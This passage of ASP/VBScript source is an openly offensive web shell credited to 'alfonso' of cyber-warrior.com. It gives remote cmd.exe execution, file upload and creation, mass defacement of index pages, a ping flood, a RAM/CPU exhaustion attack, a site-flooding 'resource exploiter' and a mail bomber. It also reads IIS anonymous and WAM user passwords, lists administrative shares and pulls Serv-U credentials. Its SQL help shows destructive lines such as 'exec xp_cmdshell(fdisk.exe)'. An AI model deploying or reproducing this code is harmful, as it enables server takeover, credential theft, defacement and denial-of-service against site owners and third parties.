file = file&"<center><br><br><font color=green><b></b></font><br></center>"
if hash9 = "copy" then
on error resume next
a=Left(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),InStrRev(replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"),"\"))
Set hackindex = FSO.CreateTextFile(a&"\alfonso.txt", True)
hackindex.write file
if err <> 0 then
response.write "<center><br><font color=#FE7A84> <font face=Wingdings size=5>N</font> Bulunduðun Dizinde Yazma YEtin yok. Bu yüzden Ýndex Sayfasý oluþturulamadý. <font face=Wingdings size=5>N</font> <br><br> <font face=Wingdings size=5>N</font> Eðer ki Server içine bir Tane index yükler ve aþaðýdaki yere tam link ini yazarsan, O zaman MASS Defaced baþlýyacaktýr. <font face=Wingdings size=5>N</font> <br><br><br></center>"
response.write "<table width=""100%"">"
response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""dizincopypaste"" action='"&FilePath&"' type=""post"">"
response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"
response.write "<input type=""hidden"" name='islem' value='"&islem&"'><input type=""hidden"" name='inject1' value='"&inject1&"'><input type=""hidden"" name='file' value='"&file&"'><input type=""hidden"" name='Time' value='"&time&"'><input type=""hidden"" name='mode' value='20'><input type=""hidden"" name='konum' value='"&konum&"'>"
Call tablo30("<b>Ýndex in Server daki kendi Ýndex inin YErini GÖster. </b>")
Call tablo30(" ")
Call tablo12("<input size=""80"" type=""text"" name=""hacked"" style='color=#C6FCBE' value='"&FolderPath&"&/index.html'>")
Call tablo12("<br><input value="" OK tamamdýr. Ýndex imi seçtim. "" type=""Submit"">")
response.write "</form></table></td></tr></table><br>"
else
set hacking = nothing
hacked = a&"\alfonso.txt"
hash6 = konum
Call MassAttack2(konum,file,hash2)
Call MassAttack(hash6,file,hash2)
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... :::: Bitttiiii :::: ..... </b></td></tr></table> "
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by alfonso ;)</b><br><br> </td></tr></table> "
Response.Write "<script language=javascript>alert('Mass Defaced Tamamalandý... ')</script>"
end if
else if hash9 = "yarat" then
hash6 = konum
Call MassAttack2(konum,file,hash2)
Call MassAttack(hash6,file,hash2)
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... :::: Bitttiiii :::: ..... </b></td></tr></table> "
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by alfonso ;)</b><br><br> </td></tr></table> "
Response.Write "<script language=javascript>alert('Mass Defaced Tamamalandý...1 ')</script>"
end if
end if
Call Hata
CASE 20 ' Hata sonucu, düzeltme yapýldý ise, burdan MAss dewaam ediyor.
on error resume next
Set cloner2 = fso.GetFile(hacked)
if err <> 0 then
response.write "<br><br><br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Ýndex Bulunamadý. KOnumunu veridðin Ýndex yada Dosya BULUNAMADI. Mass Durdurudu !!! <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br><br><br>"
set cloner2 = nothing
else
set cloner2 = nothing
file="alfonso"
hash6 = konum
Call MassAttack2(konum,file,hash2)
Call MassAttack(hash6,file,hash2)
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... :::: Bitttiiii :::: ..... </b></td></tr></table> "
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by alfonso ;)</b><br><br> </td></tr></table> "
Response.Write "<script language=javascript>alert('Mass Defaced Tamamalandý...2 ')</script>"
end if
Call Hata
CASE 21 ' MASS tester formu by alfonso
on error resume next
response.write "<table width=""100%"" class=""kbrtm"">"
response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"
response.write "<form name=""masstester"" action='"&FilePath&"' type=""post"">"
response.write "<table cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"" class=""kbrtm"">"
tablo30(" <b>MASS Permision Tester</b>")
tablo30("...... ::::: Ýzinleri Kontrol Eder ::::: ......")
tablo30("<br><b>Konum : </b><input style=""color=#C6FCBE"" size=""60"" name=""konum"" value='"&konum&"' type=""text""><br><br>")
response.write "<input type=""hidden"" value=""22"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""> "
tablo12O("<br><input value="" Teste Baþlaaaa... =) by alfonso "" type=""Submit""><br><br>")
tablo12(" ")
response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""left"" width=""100%"" ><font color=#C6FCBE><b>NOT : </b>Bununla, Alt klasörlerde Permision varmý yok mu ,Onu kontrol eder ve Listeler... </font> <font color=#C6FCBE face=Wingdings size=5>N</font></td></tr>"
response.write "</form></table></td></tr></table><br>"
Call Hata
CASE 22 ' MASS TEster iþleme görüntüleme by alfonso
Call Tester(konum)
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><b> ..... :::: Bitttiiii :::: ..... </b></td></tr></table> "
response.write "<table width=""100%""><tr><td class=""kbrtm"" align=""center""><br><br><b>by alfonso ;)</b><br><br> </td></tr></table> "
Response.Write "<script language=javascript>alert('Yetki Kontrolu tamamalandý... ')</script>"
Call Hata
CASE 23 ' arama bulma- en güzel özeliði time out olmamasý bulduðunu yazmasýdýr =) by alfonso eseridir.
response.write "<br><center>"
i=0
Call arama(konum)
response.write "</center><br>"
Response.Write "<script language=javascript>alert('"&i&" Kayýt Bulundu .... ')</script>"
nolist = True
Call Hata
CASE 24 ' Klasör iþlermleri için Upload - Dosya ayarat - klaösr yarat FORM larý by alfonso
on error resume next
response.write "<table bgcolor=#000000 width=""100%"" ><tr><td>"
response.write "<center><table width=""100%""><tr><td class=""kbrtm"" align=""center""> Upload Merkezi </td></tr><tr><td align=""center"" class=""kbrtm"">"
response.write "<form name=frmUpload method=post enctype=""multipart/form-data"" action='"&FilePath&"?mode=25&Time="&time&"&Path="&konum&"' ID=""Form1"">"
response.write "<input type=hidden name=folder value='"&konum&"' ID=""Hidden1"">"
response.write "Max: <input type=text name=max value=5 size=5 ID=""Text1""> <input type=button value=""Ayarla"" onclick=setid() ID=""Button1"" NAME=""Button1"">"
response.write "<table ID=""Table1"">"
response.write "<tr>"
response.write "<td id=upid>"
response.write "</td>"
response.write "</tr>"
response.write "</table>"
response.write "<input type=submit value="" ... :: Upload :: ... "" ID=""Submit1"" NAME=""Submit1"">"
response.write "</form>"
response.write "<script>"
response.write "setid();"
response.write "function setid() {"
response.write " str='';"
response.write " if (frmUpload.max.value<=0) frmUpload.max.value=1;"
response.write " for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input size=30 type=file name=file'+i+'><br>';"
response.write " upid.innerHTML=str+'<br>';"
response.write "}"
response.write "</script>"
response.write "</td></tr></table></center>"
response.write "<br><center><table align=""center"" width=""100%"" class=""kbrtm""><form name=""dosycrete"" action='"&FilePath&"?mode=26&konum="&konum&"&Time="&time&"' method=""post""><tr><td align=""center"">Klasör Oluþtur : <input name=""file"" value=""alfonso"" type=""text""> <input name=""git"" value="" Oluþtur "" type=""Submit""></td></tr></table></form></center>"
response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><form name=""filemaker"" action='"&FilePath&"?mode=27&konum="&konum&"&Time="&time&"' method=""post""><tr><td align=""center"">Dosya Adý : <input name=""file"" value=""alfonso.asp"" type=""text""></td></tr><tr align=""center""><td><textarea style='width:100%;height:100;' name=""islem""></textarea></td></tr> <tr align=""center""><td><input name=""git"" value=""..:: Oluþtur ::.."" type=""Submit""></td></tr></table></form></center>"
response.write "</td></tr></table>"
Call Hata
CASE 25 ' Upload iþlemi by ALFONSO
Upload()
CASE 26 ' Klasör yarat by ALFONSO
response.write "<br><br><br><br><table bgcolor=#000000 width=""100%"" ><tr><td class=""kbrtm"" align=""center"">"
if FSO.FolderExists(konum&"\"&file) = True then
response.write "<center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Böyle Bir Klasör ZATEN VAr !!!! <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center>"
else
on error resume next
FSO.CreateFolder(konum&"\"&file)
if err <> 0 then
olmadi("Klasör Oluþturulamadý")
else
oldu("Klasör Oluþturuldu")
end if
end if
response.write "</td></tr></table>"
Call hata
CASE 27 ' Dosya yarat by alfonso
response.write "<br><br><br><br><table bgcolor=#000000 width=""100%"" ><tr><td class=""kbrtm"" align=""center"">"
on error resume next
Set MyFile = FSO.CreateTextFile(konum&"\"&file, True)
MyFile.write islem
if err <> 0 then
olmadi("Dosya Oluþturulamadý")
else
oldu("Dosya Oluþturuldu")
end if
response.write "</td></tr></table>"
MyFile.close()
Call hata
CASE 28 ' CMD Formu ve iþlem yeri by alfonso
if cmdkod="" then cmdkod="ipconfig"
response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"
response.write "<form name=""commmanderbyalfonso"" method=""Post"" action='"&FilePath&"?mode=28&konum="&konum&"'> <b>CMD Komut Listele : </b><input style='color=#DAFDD0' name=""cmdkod"" size='57' value='"&cmdkod&"' type='text'><input name='"&konum&"' value='"&konum&"' type='hidden'><input name='"&mode&"' value=""28"" type='hidden'><input name='"&file&"' value=""a"" type='hidden'><input value="".:Görüntüle:."" type='Submit'> "
response.write "</td></tr></form></table></center>"
response.write "<center><table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"
response.write "<textarea style='color=#DAFDD0;width:100%;height:320;'>"
response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdkod).stdout.readall
response.write "</textarea>"
response.write "</td></tr></form><form name=""commmanderbyalfonso2"" method=""Post"" action='"&FilePath&"?mode=28&konum="&konum&"'><tr><td><b>CMD Komut Çalýþtýr: </b><input style='color=#DAFDD0' name=""inject4"" size='57' value='"&inject4&"' type='text'><input name='inject5' value='alfonso' type='hidden'><input value="" .: Çalýþtýr :. "" type='Submit'></td></tr>"
if inject5 = "alfonso" then
on error resume next
tablo12("Komut Çalýþtýrýldý. ")
end if
response.write "</form></table></center>"
response.write "<br><center><table align=""center"" width=""100%"" class=""kbrtm"">"
tablo12L("<font color=#FE7A84><b>NOT : </b> CMD komutlarý tamamen , Server üzerinde çalýþmaktadýr. Siz burda yazacaðýnýz komut orda çalýþýp, size geri dönecektir.")
tablo12L("<font color=#FE7A84><b>NOT : </b> <b>CMD Komut Listele</b> olayý, >dir, >netstat, >ping gibi geri DOS da geri bilgi döndüren komutlar kullanýlýr. AMA eðer program çalýþýtmrka, traojan yada Notepad gibi fonksiyonal ve applicaitonlý programlar, komutlarýda <b>CMD komut Çalýþtýr</b>dan Uygulamanýz gerekir.Aksi halde Sistem kýsa süreli kitlenme yaþanýr. CEvap alýnamayabilinir.GEreðinden fazla çalýþýtrm yaparsnýz , Ýþlemcide Sizin Userýnýzýn <b>RAM + CPU </b>kullnýmý anormal artacaktýr. </font> <font color=#FE7A84 face=Wingdings size=5>N</font>")
yazorta("<a href='"&FilePath&"?mode=29&konum="&konu&"&Time="&time&"' onclick=""cmdhelp(this.href);return false;"">-->> Kullanýlabilir CMD komutlarýndan BAzýlarý <<-- </a>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><b>by alfonso</b></td></tr></td></tr></table></center>"
CASE 29 ' CMD açýklama kýsmý HELPER by alfonso
response.write "<center>"
yazsol("<b>Attrib</b>: Attrib komutu dosyalara belli özellikleri verir veya kaldýrýr. c:\>attrib +r +a +s +h yazýp enter tuþuna basarsak.(help için : <b> ' attrib /? ' </b>)")
yazsol("<b>Copy - xcopy</b> : Copy ve xcopy komutu ile istenilen dosya yada dosyalarýn baþka yerlere kopyalanmasý iþlemi gerçekleþtirilir. Bilgi için bunu yazýn :' <b>copy /? '</b>")
yazsol("<b>Net use</b> : Pc nin Paylaþým, Hesaplarý, ayarlarý, kullanýcýlarý... gibi özellliklere ulaþabileceðimiz ve deðiþtirebileceðimiz bir komut <b>NET</b> . Yarým dosyasý için -> <b> net help </b> yazmanýz yeterlidir.")
yazsol("<b>Netstat</b> : PC deki açýk portlarý, ve dilediðiniz port u dinleyebilirsiniz. <b>Netstat -a -b -e -n -o -r -s -v</b> gibi parametreler alýr.")
yazsol("<b>Tracert</b> : Site, Ip, server ýn nerde olduðunu tracert yapar. <b>tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name</b> ")
yazsol("<b>IPCONFIG</b> : Server , PC nin IP bilgileirni, network bilgileirni veriyor. kulným için - > <b>ipconfig help</b> yazýn yeterldir ")
yazorta("<b>by alfonso</b>")
response.write "</center>"
CASE 30 ' PiNGer BY alfonso - Server üzerinden sýnýrsýz ping saldýrrýsý. =) Coded by alfonso
if not file = "1" then
response.write "<center><table align=""center"" width=""100%""><tr><td><form action='"&FilePath&"?mode=30&file=1&konum="&konum&"' method='post' name='pingerbye_jder'>"
yazsol(" Site Adý : <input style='color=#DAFDD0' name='url' value='siteadý.com' type='text' size=30> (Örnek: google.com) ")
yazsol(" Ping Sayýsý : <input style='color=#DAFDD0' name='inject1' value='20' type='text' size=20> (Örnek: 20) ")
yazsol(" Ping TimeOut Süresi : <input style='color=#DAFDD0' name='islem' value='750' type='text' size=20> milisaniye (Örnek:750) ")
yazsol(" Paket Boyutu : <input style='color=#DAFDD0' name='size' value='32' type='text' size=20> byte (32) ")
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> <input name='bombalaalfonso' value=' .:: Bombala ::. ' type='Submit' > </td></tr></table>"
response.write "</form></td></tr></table>"
yazsoll(" <font color=#C6FCBE> Not: Bunu kullanýrken gireceðiniz Paket boyutu Önemlidir. Mümkünce aþýrý büyük paket girmeyin, çünkü server yada site nereye saldýrrýyorsanýz, büyük paketleri filtreler ve cevap vermezler. O yüzden sürekli TÝmeOUT yazar. o yüzden yaa Boþ býrakýn yada 500 gibi normal bir seviye seçin. <font color=#C6FCBE> <font face=Wingdings size=5>N</font> </font> ")
yazsoll("<font color=#C6FCBE> Not: PÝNG sayýsýný 98 dediniz mesela, Sistem bunu 10 hamlede yapacaktýr. 10 arlý gönderektir. vede süreklisayfa kendini yenileyip, 98 olana kadar 10 ar 10 ar ping ee dewam edecektir. Burda TÝMEout OLMA gibi sorunumuz yok. 100000 deseniz bile, o bitne kadar gece gündüze ping çekebilien sistem geliþtirdim. Korkmadan, vede gece açýk býrakarak sýnýrsýz pingler çekebilirisniz. <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")
yazsoll(" <font color=#FE7A84> Not: ALFONSO, com.tr, gov.tr uzantýlý sitelere karþý koruma aldým. Ping Attaker bu sitelere karþý Çalýþtýtýlamaz, ve çalýþýtýrlsa bile Ping atmaz, size Uyarý verir. TÜrk Siteleri Koruma ilk hedefimizdir. TÜrk TÜrk ü Vurmaz. by alfonso <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")
yazsoll("<font color=#C6FCBE> <b>Ping Attack alfonso</b> tarafýndan yazýlmýþ olup, biraz hayal gücü, biraz çaba azimle, þu an kulanýdðýnýz FSO yuda yazan olarak, bundaki amacým Server ýn ,sitenin kaynaklarýný sömürmek vede onun üzerinden onun kaynaklarýný kullanrak baþka yerlerede zarar , saldýrý yapam güdenmiþtir. BUndada BUnlaa baþladým. <b>TÜM haklarý alfonso e aittir.</b> <font color=#C6FCBE> <font color=#C6FCBE> <font face=Wingdings size=5>N</font></font> ")
else
if inject1 = "" then inject1 = 0
if count = "" then count = 0
if CInt(inject1) > CInt(count) + 10 then
Call Ping_Bomb_alfonso(url,10,islem,size)
count = count + 10
inject2 = ""&FilePath&"?file=1&mode=30&url="&url&"&size="&size&"&count="&count&"&inject1="&inject1&"&islem="&islem&""
response.write "<META http-equiv=refresh content=2;URL='"&inject2&"'>"
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <b>"&count&"/"&inject1&"</b> tane Ping Çekildi. </td></tr></table>"
else if CInt(inject1) > CInt(count) then
Call Ping_Bomb_alfonso(url,CInt(inject1) mod 11,islem,size)
count = count + (CInt(inject1) mod 11)
yazortaa(" <b>"&count&"/"&inject1&"</b> tane Ping Çekildi... ")
yazortaa(" Pinger Attack by alfonso 1.0 iþlemini tamamladý... ")
else
yazortaa(" <b>"&count&"/"&inject1&"</b> tane Ping Çekildi... ")
yazortaa(" Pinger Attack by alfonso 1.0 iþlemini tamamladý... ")
end if
end if
end if
CASE 31 ' Server RAM & CPU Saldýrýsý
cmdd = array("C:\WINDOWS\System32\mspaint.exe","C:\Program Files\Internet Explorer\iexplore.exe","C:\WINDOWS\system32\notepad.exe")
if islem = "1" then
on error resume next
response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(0))
else if islem = "2" then
on error resume next
response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(1))
else if islem = "3" then
on error resume next
response.write server.createobject("wscript.shell").exec("cmd.exe /c"&cmdd(2))
else
if not file = "1" then
response.write "<center><table align=""center"" width=""100%""><tr><td>"
yazorta("<b> RAM & CPU Saldýrýsý for SERVER by alfonso =) 1.0 </b>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><font color=#C6FCBE> Server ýn CPu ve RAm kaynaklarýný 1 dk içinde tüketebilen bir alfonso eseridir. Bununla sadece, 3 tür program sürekli açýlýr ve kapatýlmaz(Paint, Notepad, Explorer) Server en fazla 1 dk içinde Ram&Cpu sorunu ve kitlenmeler, cevap vermemeler, hatat resetlenme ilede sonuçlanabilir.</font></td></tr></table>"
yazorta(" <a href='"&FilePath&"?mode=31&file=1'>..:: RAM & CPU Attacker ý ÇALIÞTIR .. by alfonso ::..</a> ")
response.write "</td></tr></table></center>"
else
Call Ram_Cpu
end if
end if
end if
end if
CASE 32 ' SÝte kaynak Sömürücü by alfonso =)
if not islem = "1" then
response.write "<center><table align=""center"" width=""100%""><tr><td>"
yazorta("<b> SÝte Kaynak Sömücü 1.0 by alfonso </b>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><form name=""sitefuckerbyalfonso"" method='post' action='"&FilePath&"?mode=32'>Site Adresi : <input name='url' value='http://www.siteadi.com' style='color=#C6FCBE' size=55 type='text'></td></tr><tr><td> Robot Sayýsý : <input name='file' style='color=#C6FCBE' type='text' value='50' size=30> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Sömür ::..' type='Submit'></td></tr></form></table>"
yazsol("Belirttiðiz kadar Robot kadar baðlanýr ve siteyi sömürür. Ayrýca Saldýrý sürekli kendini güceller, yeniler. Sonsuzdur. =) Robot u Baðlantýnýza göre ayarlayýn. Mesela; Robot u 50 yaparsanýz.O sayfa içinde 50 tane ayný anda açýlacak site ve indirecektir siteleri. ve o sýrada sürekli siz, dosya indiroyr geçiçi olarak. VE bu olay her 30 snde güncelleniyor Otomatik. Birkez çalýþýtr Ömür boyu kapatmazsan penceryi çalýþýr bir MAkina.")
yazsol("Site kodlarýný, BAndwith ini ve ASP kitlenmesi yada SQL sömürmede, ressim, text sömürmede ÜStüne yoktur..")
yazorta("TÜm haklarý Saklýdýr by alfonso =)")
response.write "</td></tr></table></center>"
else
on error resume next
yazorta("<b> SÝte Kaynak Sömücü 1.0 by alfonso =) 1.0 </b>")
yazorta("Sömürme MEkanizmasý Devrede...")
yazsol("Durdurmak için Pencereyi kapat. "&file&" Kadar baðlanýp 30 sn da günceliyor saldýrýyý...")
yazorta("<b>by alfonso</b>")
Call Somurgen(file,url)
yazorta(" 20 SN sonra yenileniyor... by alfonso =) ")
response.write "<META http-equiv=refresh content=20;URL='"&FilePath&"?mode=32&islem=1&url="&url&"&file="&file&"'>"
end if
CASE 33 ' Mail BOMber by alfonso :) TÜm Kodlarýn FSO nun HAklarý ALFONSO ya aittir. Sýnýrsýz Mail atma imkaný sunuyorum size. Kýyaðýmý unutmayýn...
if not islem = "1" then
response.write "<center><table align=""center"" width=""100%""><tr><td>"
yazorta("<b> Mail Bomber 1.1 by alfonso </b>")
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td><form name=""mailbomberbyalfonso"" method='post' action='"&FilePath&"?mode=33'>Mail Adresi : <input name='file' value='deneme@hotmail.com' style='color=#C6FCBE' size=55 type='text'></td></tr><tr><td> Bomb Sayýsý : <input name='count' style='color=#C6FCBE' type='text' value='50' size=22> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Bommbala ::..' type='Submit'></td></tr></form></table>"
yazsol("Sýnýrsýz Mail Bomb. Cdonts & Cydos Destekler. %100 inbox. Cyberwarrior.com , org, net ,maillerine Bomb yapamazsýnýz.")
yazorta("TÜm haklarý Saklýdýr by alfonso =)")
response.write "</td></tr></table></center>"
else
if request.cookies("bilesen") = "0" then
if MailKorumasi(file) = 0 then
if inject1 = "" then inject1 = 0
if CInt(inject1) + 9 < CInt(count) then
for j=0 to 10
Call MailBomber_by_alfonso(file)
next
inject1 = inject1 + 10
response.write "<META http-equiv=refresh content=1;URL='"&FilePath&"?mode=33&islem=1&file="&file&"&count="&count&"&inject1="&inject1&"'>"
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <b>"&inject1&"/"&count&"</b> tane Mail Gönderildi... </td></tr></table>"
else if CInt(inject1) < CInt(count) then
for j=0 to (count mod 10)
Call MailBomber_by_alfonso(file)
next
inject1 = inject1 + (count mod 10)
yazortaa(" <b>"&inject1&"/"&count&"</b> tane Mail Gönderildi... ")
yazortaa(" Mail Bomber by alfonso 1.0 iþlemini tamamladý... ")
else
yazortaa(" <b>"&inject1&"/"&count&"</b> tane Mail Gönderildi... ")
yazortaa(" Mail Bomber by alfonso 1.0 iþlemini tamamladý... ")
end if
end if
else
response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <font color=#FE7A84> <font face=Wingdings size=5>N</font> BOMB yapýlamadý. Tasvip etmediðimiz Bir mail e Saldýrdýðýnýz için. by alfonso !!!! <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </td></tr></table>"
end if
else
response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align=""center"" > <font color=#FE7A84> <font face=Wingdings size=5>N</font> Server Gerekli Olan Cdonts yada Cydos Bilesenlerini desteklemiyor. <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </td></tr></table>"
end if
end if
CASE 34 ' MSSQL - MYSQL Baðlantý Formu by alfonso ;)
if not islem = "1" then
Call MSSQL_Form
yazortaa(" Eðerki, Sitelerin MSSQL bilgilerini biliyorsanýz, bununla çok kolay baðlanabilir.. ")
yazortaa(" Tablolarý görebilir, üzerinde SQL komut çalýþtýrabilir, verileri okuyaiblirisniz ")
yazortaa(" Çok saðlam ve güçlü bir MSSQL Manager hizmeti Saðlar size...")
yazortaa(" <b>by alfonso :)</b>")
else
Call SQL_menu_by_alfonso
Call Tablolama
end if
nolist = True
CASE 35 ' MSSQL - MYSQL Conneciton için by alfonso ;)
Call SQL_menu_by_alfonso
Call MSSQL_by_alfonso(alfonsosql,table)
nolist = True
CASE 99 ' alfonso WAS HERE - FEEL THE POWER OF TURKS
'Türk Bayraðý Ascii Karakterlerle - Created By ALFONSO :)
Response.Write "<br><center><table width=80 height=50 cellpadding=0 cellspacing=0><tr><td width=10 align=left valign=middle style=""background-color:AA0000""> </td><td width=70 align=left valign=middle style=""background-color:AA0000""><font size=7 face=Wingdings>Z</font></td></tr></table></center><br>"
yazorta("<b>Biz Ne yaptýk / What We Do?</b>")
yazsol("Biz bir FSO & MSWCTools & XMLHTTP Compenent lerini kullanarak Server a site üzerinden HTTP protocolunden eriþim saðlandýðýnda, Size Server ýn tüm imkanlarýndan yararlanmanýz için, Permission, þifre, gizli tüm içeriklere direk ulaþma, yada aþma gibi özelikleri olan. Server ý çökertmeye , hatta kaynaklarýný son damlasýna kullanabilen Cyber-Warrior.CoM adýna hizmet veren Bir Canavar yarattýk.")
yazorta("<b>Adý ? Name ?</b>")
yazsol("Bu yazýlým alfonso yazýlýmýdýr. Bunun adý <b>a</b>alfonso <b></b>F<b>SO</b> dur. oda kýsaca -> <b>ALFSO'dur</b>")
yazorta("<b>Biz Kimiz / Who We Are?</b>")
yazsol("<b><a href=""mailto:cwalfonso@hotmail.com"">alfonso</a> : Sitemiz <a href=""http://cyber-warrior.com"" target=_blank"">http://cyber-warrior.com</a></b>")
olmadi("<b>..:: TAKLÝTLERÝNDEN SAKININ !!! ::..</b>")
CASE 36 ' SQL komut YArdým kýlavuzu by alfonso
yazorta("<b>SQL Komut Yardým Merkezi by alfonso :) </b>")
yazsoll("<b>SELECT</b> - Seçme&listeleme")
yazsol("Select * from TABLEADI<br> Select * from TABLEADI where SUTUNADI = DEÐER <br> Select * from tblAdmin where ID = 1")
yazsoll("<b>INSERT</b> - ekleme")
yazsol("Insert into TABLOADI (stunisimleri) values (deðeleri)<br> Insert into tblAdmin (Name,Pwd,Gruop) values ('alfonso','123456',1)")
yazsoll("<b>UPDATE</b> - editleme")
yazsol("Update TABLOADI set stunadý = 'deðeri' where Stunadý = deðeri <br> Update tblAdmin set Name = 'alfonso' where ID = 1")
yazsoll("<b>DELETE</b> - silme")
yazsol("Delete TABLOADI where Stunadý = deðeri<br>Delete tblAdmin where ID = 1")
yazsoll("<b>DROP</b> - tabloyu komple silme")
yazsol("Drop table TABLOADI <br> Drop Table tblAdmin")
yazsoll("<b>Exes</b> - Fdisk çektirmek için")
yazsol("exec xp_cmdshell(fdisk.exe)")
yazsoll("<b>ShutDown</b> - SQL server kapanýr.")
yazsol("shutdown with nowait")
CASE 37 ' Sistem Analizer by alfonso ;)
on error resume next
Set alfonsoNet = Server.CreateObject("WSCRIPT.NETWORK")
response.write "<center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td width='300'>"
yazorta("<b>Server ýn Bilgileri</b>")
yazsol("OS : <font color=#C6FCBE>"& OS() &"</font>")
yazsol("PC & Oturum Adý : <font color=#C6FCBE>\\"& alfonsoNet.ComputerName &"\"&alfonsoNet.UserName&"</font>")
struser = alfonsoNet.UserName
yazsol("Server : <font color=#C6FCBE>"&request.servervariables("SERVER_NAME")&"</font>")
yazsol("IP : <font color=#C6FCBE>"&request.servervariables("LOCAL_ADDR")&"</font>")
yazsol("HTTPD : <font color=#C6FCBE>"&request.servervariables("SERVER_SOFTWARE")&"</font>")
yazsol("WebRoot : <font color=#C6FCBE>"&request.servervariables("APPL_PHYSICAL_PATH")&"</font>")
yazsol("LogRoot : <font color=#C6FCBE>"&request.servervariables("APPL_MD_PATH")&"</font>")
yazsol("Zaman : <font color=#C6FCBE>"&date()&" - "&time()&"</font>")
yazsol("HTTPs : <font color=#C6FCBE>"&request.servervariables("HTTPS")&"</font>")
response.write "</td><td width='350'>"
yazorta("<b>Serverýn Senden Algýladýklarý</b>")
yazsol("IP : <font color=#C6FCBE>"&request.servervariables("REMOTE_ADDR")&"</font>")
yazsol("Proxy IP : <font color=#C6FCBE>"&request.servervariables("HTTP_X_FORWARDED_FOR")&"</font>")
yazsol("User Agent : <font color=#C6FCBE>"&request.servervariables("HTTP_USER_AGENT")&"</font>")
yazsol("Interface : <font color=#C6FCBE>"&request.servervariables("GATEWAY_INTERFACE")&"</font>")
yazsol("Protocol : <font color=#C6FCBE>"&request.servervariables("SERVER_PROTOCOL")&"</font>")
yazsol("Method : <font color=#C6FCBE>"&request.servervariables("REQUEST_METHOD")&"</font>")
yazsol("Via : <font color=#C6FCBE>"&request.servervariables("HTTP_VIA")&"</font>")
yazsol("Cache Control : <font color=#C6FCBE>"&request.servervariables("HTTP_CACHE_CONTROL")&"</font>")
response.write "</td></tr></table></center>"
on error resume next
Set IIsObject = GetObject ("IIS://localhost/w3svc")
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td colspan=2>"
yazorta("<b>IIS Bilgileri</b>")
response.write "</td></tr><tr><td width='50%'>"
yazsol("AnonymousUserName : <font color=#C6FCBE>"&IIsObject.Get("AnonymousUserName")&"</font>")
yazsol("AnonymousUserPass : <font color=#C6FCBE>"&IIsObject.Get("AnonymousUserPass")&"</font>")
response.write "</td><td width='50%'>"
yazsol("WAMUserName : <font color=#C6FCBE>"&IIsObject.Get("WAMUserName")&"</font>")
yazsol("WAMUserPass : <font color=#C6FCBE>"&IIsObject.Get("WAMUserPass")&"</font>")
Set IIsObject = Nothing
response.write "</td></tr><tr><td colspan=2>"
yazorta("<a href='"&FilePath&"?mode=38&konum="&konum&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">..:: Açýklama Ýçin Týklayýnýz.. by alfonso ::..</a>")
response.write "</td></tr></table></center>"
strServer = alfonsoNet.ComputerName
set objFs = GetObject("WinNT://" _
& strServer & "/LanmanServer,FileService")
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td width=260>"
yazorta(" <b>Server' in Paylaþýma Açýk Klasörleri by alfonso </b>")
yazsol("<a href='"&FilePath&"?konum=//"&strServer&"/C$'>\\"&strServer&"\C$</a>")
yazsol("<a href='"&FilePath&"?konum=//"&strServer&"/Admin$'>\\"&strServer&"\Admin$</a>")
For Each objShare In objFs
yazsol("<a href='"&FilePath&"?konum=//"&strServer&"/"&objShare.name&"'>\\"&strServer&"\"&objShare.name&"</a>")
Next
response.write "</td></tr></table></center>"
response.write "<br><center><table bgcolor=#000000 cellpadding=""1"" cellspacing=""1"" ><tr><td>"
yazorta("<b> Uzakdan Serv-U & GeneFtp & UsersTxT Eriþimi SOnucu by alfonso </b>")
alfonsoServuRemote()
yazorta("<b>Geliþmiþ Arama için</b>")
